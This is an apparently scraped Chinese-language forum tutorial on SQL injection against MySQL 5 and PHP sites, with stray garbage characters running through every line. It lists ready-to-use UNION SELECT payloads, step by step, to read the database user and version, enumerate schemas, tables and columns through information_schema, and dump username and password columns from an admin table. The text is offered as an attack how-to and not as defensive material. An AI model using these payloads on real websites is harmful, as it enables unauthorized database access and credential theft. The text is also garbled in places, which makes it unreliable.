/ e3 @) P) N# {
教程内容:Mysql 5+php 注入. H# Z4 f4 _5 I+ u8 ^( q2 ~
: m5 `# R' K" ?3 }; r- f9 v
' \, T$ g K" Z
* n% [2 N6 h( P- N4 f" Q
一.查看MYSQL基本信息(库名,版本,用户)
1 h) o! o0 N; ~+ H$ K0 u. c0 v$ I4 C0 n) {1 W1 [; i
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*4 G: v7 ~+ s% e/ O, Z' B0 j
8 y# r. v2 r- v: w- e
二.查数据库
1 t/ Y# _6 [! e6 V3 D: B
8 A- p% U# |: ~- u* g( \and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
" n Z5 ^; E' n7 e$ {limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
0 F% G, m, f( J) h/ S& D6 R& s" p, X( l& B6 P- S& Y
三.暴表
- h, A6 P* v I
" k$ M# D4 w0 Z7 p1 z* Rand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*1 h9 Y! e$ n3 |$ w
! g9 }# n5 r! I
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。$ K. K! u3 \! ]2 ~
8 i1 Y& y4 g4 o; c& V
四.暴字段: g; o; Y I' n+ O# a
% q7 C- y- y- m& L
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
. ]& w$ G3 I# @3 Z. h, ^$ o- c5 Z5 N0 t0 K, j! h
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
/ [( |" {& A1 s3 T) Q
' e4 x3 Q% d( z6 H: E4 `五.暴数据& t8 h! x& b0 F" h
( n# P5 J/ x) p/ u. Z1 p% z% `
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*( G% d) M$ U9 f& M# o; O- G
: c& _3 C7 I6 |+ h
; J8 e$ ] y! G* | E这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。# M- F4 Q/ y6 \: L& [8 S" L
|